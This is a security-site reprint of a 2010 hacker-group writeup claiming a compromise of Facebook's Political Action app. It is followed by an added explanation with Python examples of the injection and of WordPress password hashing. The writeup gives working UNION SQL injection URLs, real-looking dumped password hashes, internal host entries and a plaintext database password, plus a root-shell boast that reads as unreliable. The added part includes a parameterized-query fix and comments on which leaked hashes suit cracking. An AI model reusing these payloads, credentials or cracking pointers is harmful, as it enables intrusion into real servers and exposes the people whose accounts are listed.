Facebook Political Action SQL Injection

Published: 20 Jul 2010 | Reported by: Inj3ct0r | Type: packetstorm | Source: packetstormsecurity.com | 36 views

Facebook Political Action SQL Injection by Inj3ct0r Team: a UNION-based MySQL injection in the issue.php page of the Political Action app on apps.facebook.com. The writeup reports a root shell on the server and discloses the verifiable requests, dumped WordPress credential hashes, a file path on a dreamhosters.com host, the server's /etc/hosts and a fragment of its my.cnf.

Code
`====================================================  
Facebook's servers were hacked again by Inj3ct0r Team  
====================================================  
  
  
  
Part 1 Original: http://inj3ct0r.com/exploits/11638  
  
Part 2 Original: http://inj3ct0r.com/exploits/13403  
  
  
[+] English translation  
Inj3ct0r official website => Inj3ct0r.com  
Inj3ct0r community => 0xr00t.com  
  
[Inj3ct0r.com ASCII banner]  
  
[0x00] [Introduction]  
[0x01] [Search for bugs / crash]  
[0x02] [0wner]  
[0x03] [Conclusion]  
[0x04] [Greetz]  
  
  
[0x00] [Introduction]  
  
  
  
  
This log is a limited version of the information gathered, since the most important  
parts are being kept private so that the proper authorities can analyze them and close the loopholes in the system.  
  
We did not change the main page, did not sell server backups and did not delete files.  
  
We have demonstrated the flaw in the system. Start =] ..  
  
  
  
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo  
Sir Zaid, personal RESPECT! y0u helped me write this article and find the vulnerabilities  
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo  
  
  
  
[0x01] [Search for bugs / crash]  
  
  
  
inj3ct0r@host [/home]# ./inj3ct0r.com_0day_Search http://apps.facebook.com  
  
...Search Vulnerabilities . . . . . . . . . .. . . .. . . . ..  
  
[+] found 13 vulns and 6 warning  
[+] open 31337 port yes  
[+] connect...  
  
Brevity is the soul of wit..  
  
  
inj3ct0r.com@mybox [~]  
  
inj3ct0r.com@host [~]# cd /home  
  
inj3ct0r@host [/home]# ./inj3ct0r.com_0day http://apps.facebook.com  
  
...attack starting . . . . . . . . . .. . . .. . . . ..  
  
[0x02] [0wner]  
  
Shell on port 31337 successful . . . . .  
  
inj3ct0r.com@host [/home]# ./nc -v 66.220.153.15 31337  
  
...............................................................  
  
  
apps.facebook@host [~]# id  
  
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)  
  
  
-[0x33]- Proofs  
  
  
############  
# REQUESTS #  
############  
  
;===== BASIC INFO  
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+1  
  
;===== LIST TABLES  
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name),6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1  
  
;===== LIST COLUMNS  
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1  
  
;===== LIST WORDPRESS USERS/PASS  
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+candukincaid.wp_users--+1  
  
admin:$P$BQFUeKJK810OT9Y/Hmcx/hZdaRBEmw/  
lucia:$P$BqEFbcc1.uPFB8SfIIDcmVq7pc40WK.  
tom:$P$BlBjwW.57R/lHuoGLSUyAutopYdoEt/  
  
-----  
  
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+churchwpdb.wp_users--+1  
  
admin:$P$B6RRs18hNYnYWPgNy0brmY/qPg3W7b.  
test:$P$BuuuSp.VN0Ha5/p11u20ATdWqeEk  
  
-----  
  
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+luciacanduwp.wp_users--  
  
admin:$P$B1jGLGuDkN6gNT68q92h3RG3wG4qwi/  
lucia:$P$BBtUst3KjOqCdTNVVTGdWlgayz  
  
###############  
# INFORMATION #  
###############  
;===== PATH  
/home/tomkincaid/tomkincaid.dreamhosters.com/facebookclient/shared_lib.php  
  
;===== BASIC INFO  
[email protected]  
politicsapp  
5.0.45-log  
  
;===== TABLES  
  
# astro  
** app  
** oscache  
** user  
  
  
# candukincaid  
** wp_commentmeta  
** wp_comments  
** wp_links  
** wp_options  
** wp_postmeta  
** wp_posts  
** wp_px_albumPhotos  
** wp_px_albums  
** wp_px_galleries  
** wp_px_photos  
** wp_px_plugins  
** wp_term_relationships  
** wp_term_taxonomy  
** wp_terms  
** wp_usermeta  
** wp_users  
  
# cemeteries  
** AmazonItem  
** AmazonType  
** CameraType  
** Format  
** Guestbook  
** Links  
** Photo  
** Scan  
  
# churchwpdb  
** wp_comments  
** eventscalendar_main  
** icl_languages  
** icl_languages_translations  
** icl_locale_map  
** icl_translations  
** links  
** options  
** postmeta  
** posts  
** term_relationships  
** term_taxonomy  
** terms  
** usermeta  
** users  
  
# countdownapp  
** oscache  
** user  
  
# crush  
** couple  
** oscache  
** user  
  
# dare  
** flag  
** game  
** item  
** user  
  
# friendiq  
** oscache  
** score  
** user  
  
# giants  
** app  
** league  
** media  
** mediaforuser  
** oscache  
** post  
** team  
** topic  
** user  
  
# hookup  
** couple  
** neverblue  
** oscache  
** user  
  
# jauntlet  
** user  
  
# loccus  
** checkin  
** oscache  
** user  
  
# luciacanduwp  
** wp_comments  
** wp_links  
** wp_options  
** wp_postmeta  
** wp_posts  
** wp_term_relationships  
** wp_term_taxonomy  
** wp_terms  
** wp_usermeta  
** wp_users  
  
# maps  
** place  
** user  
  
# martisor  
** user  
  
# mediax  
** oscache  
** user  
  
# mostlikely  
** callback  
** statement  
** statementforuser  
** user  
  
# music  
** itemforuser  
** oscache  
** user  
  
# pimpfriends  
** activity  
** ad  
** favorite  
** gift  
** giftforho  
** hoforpimp  
** johnforho  
** oscache  
** permission  
** photoforuser  
** room  
** user  
** wall  
** whistle  
  
# plans  
** attend  
** cache  
** event  
** place  
** user  
  
# politicsapp  
** app  
** badge  
** badgeforuser  
** issue  
** oscache  
** position  
** positionforuser  
** post  
** user  
  
# postergifts  
** category  
** categoryproduct  
** categoryrelationship  
** image  
** oscache  
** posterforuser  
** user  
  
# posters2  
** category  
** categoryproduct  
** categoryrelationship  
** image  
** oscache  
** posterforuser  
** user  
  
# projectbasecamp  
** clicktimeproject  
** clicktimereport  
** clicktimetask  
** idcorrelation  
** projectbudget  
** taskforuser  
** user  
  
# pwnfriends  
** photo  
** photoforfriend  
** photoforuser  
** user  
  
# quiz  
** app  
** question  
** quiz  
** result  
** resultforquestion  
** resultforuser  
** user  
  
# seeall  
** network  
** networkforuser  
** test2  
** userpref  
  
# send  
** app  
** item  
** itemforuser  
** neverblue  
** user  
  
# supporter  
** oscache  
** user  
  
# swapu  
** item  
** itemforuser  
** network  
** networkforuser  
** swaptype  
** user  
  
# tomsapps  
** ad  
** adclick  
** app  
** contest  
** notification  
  
# travelbug  
** bug  
** bugcache  
** user  
  
# tv  
** app  
** oscache  
** post  
** series  
** seriesforuser  
** thread  
** threadforuser  
** user  
  
# wikitravel  
** badmap  
** wikitravelimage  
** wikitravelpage  
  
  
---------------------------------------------------------------------------------------------------------------------------------------------------  
  
read /etc/hosts  
  
127.0.0.1 localhost localhost.localdomain   
192.168.1.167 140696-db2.flufffriends.com 140696-db2   
192.168.1.166 140695-db1.flufffriends.com 140695-db1   
192.168.1.165 140694-web2.flufffriends.com 140694-web2   
192.168.1.164 140693-web1.flufffriends.com 140693-web1   
69.63.176.141 api.facebook.com  
208.116.17.80 peanutlabs.com  
  
----------------------------------  
  
/etc/my.cnf  
  
#SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1  
  
log-bin=/var/lib/mysqllogs/bin-log  
  
binlog-do-db=fluff2  
  
expire-logs-days=14  
  
  
  
server-id = 2  
  
  
  
#master-host=69.63.180.15  
  
#master-user=tomkincaid_user  
  
#master-password=tomkincaid123  
  
#master-connect-retry=50  
  
replicate-do-db=miserman  
  
  
#log-slave-updates  
  
expire_logs_days = 14  
  
  
goOd =] Nice Hacking old school xD  
  
  
[0x03] [Conclusion]  
  
  
  
There is no 100% security! Be safe, my friends! Watch for vulnerabilities and update promptly! Follow the updates on Inj3ct0r.com (Inj3ct0r Exploit Database)  
  
  
  
[0x04] [Greetz]  
  
  
  
Greetz to all users of Inj3ct0r.com and the 31337 Inj3ct0r Members!   
  
31337 Inj3ct0r Members:  
  
cr4wl3r, The_Exploited, eidelweiss, SeeMe, XroGuE, agix, gunslinger_, Sn!pEr.S!Te, indoushka,  
  
Sid3^effects, L0rd CrusAd3r, Th3 RDX, r45c4l, Napst3r™, etc..  
  
----------------------------------------------------------------------------------------------  
  
Personally h4x0rz:  
Sir Zaid (none)  
Dante90 http://inj3ct0r.com/author/916  
SONiC http://inj3ct0r.com/author/2545  
**RoAd_KiLlEr** http://inj3ct0r.com/author/2447  
MasterGipy http://inj3ct0r.com/author/2346  
  
You are good hackers. Respect y0u!  
  
  
Sir Zaid, thank you for pushing me to write this article and for reporting the vulnerability! Personal respect to you from Inj3ct0r Team!  
  
Friendly projects: Hack0wn.com, SecurityVulns.com, SecurityHome.eu, Xiya.org, Packetstormsecurity.org.. we have many friends)) Go to http://inj3ct0r.com/links =]  
  
At the time of publication, all requests still work! Attached images: inj3ct0r.com/facebook_part2.zip  
  
We want to thank the following people for their contribution.  
  
Do not forget to keep track of vulnerabilities on Inj3ct0r.com  
  
H.A.C.K.T.I.V.I.S.M. WIN! =]  
  
`
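The requests in the Proofs section above are textbook UNION-based injection: `issueid=1 and 1=2` makes the original WHERE clause false so only the UNIONed rows are rendered, the UNION SELECT has to supply the same number of columns as the original query, `information_schema.tables` and `.columns` are walked to enumerate every schema the database account can see, and hex literals stand in for strings so no quote character is needed (0x6d7973716c is 'mysql', 0x696e666f726d6174696f6e5f736368656d61 is 'information_schema'). The following script is an added example, not code from the advisory or from the Political Action app: it reproduces the vulnerable and the hardened form of such an issue.php lookup against a constructed in-memory SQLite database. The `issue` and `wp_users` tables, their rows and the placeholder hash strings are invented here, and SQLite's `||` operator replaces the MySQL-only functions (CONCAT_WS, user(), version()) used on the page.

```python
import sqlite3

# Constructed stand-in for the database the page's requests hit: the "issue"
# table that issue.php reads, plus a WordPress wp_users table reachable through
# the same database account. Table names, rows and hash strings are invented.
SCHEMA = """
CREATE TABLE issue (issueid INTEGER PRIMARY KEY, title TEXT, summary TEXT, votes INTEGER);
INSERT INTO issue VALUES (1, 'Healthcare', 'Sample issue text', 42);
CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
INSERT INTO wp_users VALUES (1, 'admin', '<placeholder-hash-1>');
INSERT INTO wp_users VALUES (2, 'lucia', '<placeholder-hash-2>');
"""

# Same shape as the page's first request after URL decoding: a false predicate
# (and 1=2) removes the legitimate row, UNION SELECT with a matching column
# count (4 here) appends attacker-chosen rows, and the trailing comment
# discards whatever SQL the script appends after the id.
UNION_PAYLOAD = (
    "1 and 1=2 UNION SELECT 1,user_login||':'||user_pass,3,4 FROM wp_users--"
)


def open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_issue_vulnerable(conn: sqlite3.Connection, issueid: str) -> list:
    """The pattern the page's requests imply: the query-string value is pasted
    into the SQL text, so it can introduce new syntax (UNION, comments)."""
    sql = "SELECT issueid, title, summary, votes FROM issue WHERE issueid=" + issueid
    return conn.execute(sql).fetchall()


def lookup_issue_safe(conn: sqlite3.Connection, issueid: str) -> list:
    """Hardened version: enforce the expected type, then bind the value as a
    parameter. A bound value is data, never SQL, so the UNION trick is inert."""
    issue_no = int(issueid)  # raises ValueError on anything but an integer
    sql = "SELECT issueid, title, summary, votes FROM issue WHERE issueid=?"
    return conn.execute(sql, (issue_no,)).fetchall()


def leaked_logins(rows: list) -> set:
    """Collect the user_login part of 'login:hash' strings returned in the
    title column by the UNIONed query; legitimate rows contribute nothing."""
    return {
        row[1].split(":", 1)[0]
        for row in rows
        if isinstance(row[1], str) and ":" in row[1]
    }


def decode_hex_literal(literal: str) -> str:
    """MySQL hex literals such as 0x6d7973716c are how the page's requests name
    schemas without using quote characters."""
    return bytes.fromhex(literal[2:]).decode("ascii")


if __name__ == "__main__":
    db = open_db()
    print("vulnerable:", lookup_issue_vulnerable(db, UNION_PAYLOAD))
    try:
        lookup_issue_safe(db, UNION_PAYLOAD)
    except ValueError as exc:
        print("hardened rejected the payload:", exc)
    print(decode_hex_literal("0x6d7973716c"),
          decode_hex_literal("0x696e666f726d6174696f6e5f736368656d61"))
```

The hardened variant does two things the vulnerable one does not: it checks the type before any SQL is built, and it binds the value so the driver never lets it become syntax. Binding alone would also defeat this payload (the text simply never matches an integer column), but rejecting bad input up front gives you an event to log and alert on instead of a silently empty page.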

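The user_pass values dumped in the Proofs section are phpass portable hashes, the format WordPress used for its wp_users table: the `$P$` prefix, one character encoding log2 of the iteration count (`B` is 2^13 = 8192 rounds), an 8-character salt, and 22 characters of phpass's own base-64 encoding of an iterated MD5. Salted and iterated is better than the plain MD5 many 2010-era applications stored, but still far cheaper to brute-force than a modern password KDF. The following is an added example, not code from the advisory, from phpass or from WordPress: a Python port of the phpass portable algorithm with a verifier and a count decoder. The password and salt in the usage are constructed.

```python
import hashlib
import hmac

# phpass's private alphabet. The index of a hash's 4th character is log2 of the
# MD5 iteration count; WordPress emitted '$P$B', index 13, so 8192 iterations.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data: bytes, count: int) -> str:
    """phpass's own base-64 variant (not RFC 4648), ported from its encode64()."""
    out = []
    i = 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        i += 1
        if i > count:
            break
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        i += 1
        if i > count:
            break
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def phpass_iterations(setting: str) -> int:
    """Decode the MD5 iteration count from a '$P$' or '$H$' hash/setting string."""
    if setting[:3] not in ("$P$", "$H$") or len(setting) < 12:
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(setting[3])  # ValueError if not in the alphabet
    if not 7 <= count_log2 <= 30:
        raise ValueError("iteration count out of range")
    return 1 << count_log2


def phpass_crypt(password: str, setting: str) -> str:
    """Port of phpass crypt_private(): md5(salt + pw), then `count` rounds of
    md5(prev + pw), appended to the 12-character setting prefix."""
    count = phpass_iterations(setting)
    salt = setting[4:12]
    pw = password.encode("utf-8")
    digest = hashlib.md5(salt.encode("utf-8") + pw).digest()
    for _ in range(count):
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def phpass_hash(password: str, salt: str, count_log2: int = 8) -> str:
    """Build the setting the way WordPress did (count_log2=8 yields the 'B')
    and hash. phpass draws the 8-character salt at random from ITOA64."""
    if len(salt) != 8:
        raise ValueError("salt must be 8 characters")
    return phpass_crypt(password, "$P$" + ITOA64[min(count_log2 + 5, 30)] + salt)


def phpass_check(password: str, stored: str) -> bool:
    """Constant-time comparison; malformed or truncated hashes never verify."""
    try:
        computed = phpass_crypt(password, stored)
    except ValueError:
        return False
    return hmac.compare_digest(computed.encode("utf-8"), stored.encode("utf-8"))


if __name__ == "__main__":
    # Constructed password and salt, not values taken from the page.
    h = phpass_hash("correct horse battery", "abcdefgh")
    print(h, phpass_iterations(h), phpass_check("correct horse battery", h))
```

A well-formed `$P$` hash is always 34 characters (3 + 1 + 8 + 22). Several of the strings listed on the page are shorter than that, so they were cut off somewhere before publication and would fail `phpass_check` regardless of the password; only the full-length entries are usable as crack targets.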

Vulners AI Score: 7.4 (High risk)